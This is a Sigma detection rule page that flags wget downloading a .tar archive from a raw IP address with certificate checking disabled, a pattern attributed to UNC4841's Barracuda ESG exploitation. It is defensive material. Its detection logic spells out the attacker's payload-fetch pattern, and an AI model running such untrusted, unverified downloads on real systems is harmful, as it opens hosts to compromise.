UNC4841 - Download Tar File From Untrusted Direct IP Via Wget
Detects execution of "wget" to download a "tar" from an IP address that doesn't have a trusted certificate. As seen used by UNC4841 during their Barracuda ESG zero day exploitation.
Sigma rule (View on GitHub)
1title: UNC4841 - Download Tar File From Untrusted Direct IP Via Wget
2id: 23835beb-ec38-4e74-a5d4-b99af6684e91
3status: test
4description: Detects execution of "wget" to download a "tar" from an IP address that doesn't have a trusted certificate. As seen used by UNC4841 during their Barracuda ESG zero day exploitation.
5references:
6 - https://www.mandiant.com/resources/blog/barracuda-esg-exploited-globally
7author: Nasreddine Bencherchali (Nextron Systems)
8date: 2023/06/16
9tags:
10 - attack.defense_evasion
11 - attack.t1140
12 - detection.emerging_threats
13logsource:
14 product: linux
15 category: process_creation
16detection:
17 selection:
18 Image|endswith: '/wget'
19 CommandLine|re: 'https://[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}'
20 CommandLine|contains: '--no-check-certificate'
21 CommandLine|endswith: '.tar'
22 filter_main_local_ips:
23 # Note: Uncomment this filter if you want to exclude local IPs
24 CommandLine|contains:
25 - 'https://10.' # 10.0.0.0/8
26 - 'https://192.168.' # 192.168.0.0/16
27 - 'https://172.16.' # 172.16.0.0/12
28 - 'https://172.17.'
29 - 'https://172.18.'
30 - 'https://172.19.'
31 - 'https://172.20.'
32 - 'https://172.21.'
33 - 'https://172.22.'
34 - 'https://172.23.'
35 - 'https://172.24.'
36 - 'https://172.25.'
37 - 'https://172.26.'
38 - 'https://172.27.'
39 - 'https://172.28.'
40 - 'https://172.29.'
41 - 'https://172.30.'
42 - 'https://172.31.'
43 - 'https://127.' # 127.0.0.0/8
44 - 'https://169.254.' # 169.254.0.0/16
45 condition: selection and not 1 of filter_main_*
46falsepositives:
47 - Unknown
48level: high
References
Related rules
- UNC4841 - Download Compressed Files From Temp.sh Using Wget
- UNC4841 - SSL Certificate Exfiltration Via Openssl
- Potential BlackByte Ransomware Activity
- Linux Base64 Encoded Pipe to Shell
- UNC4841 - Barracuda ESG Exploitation Indicators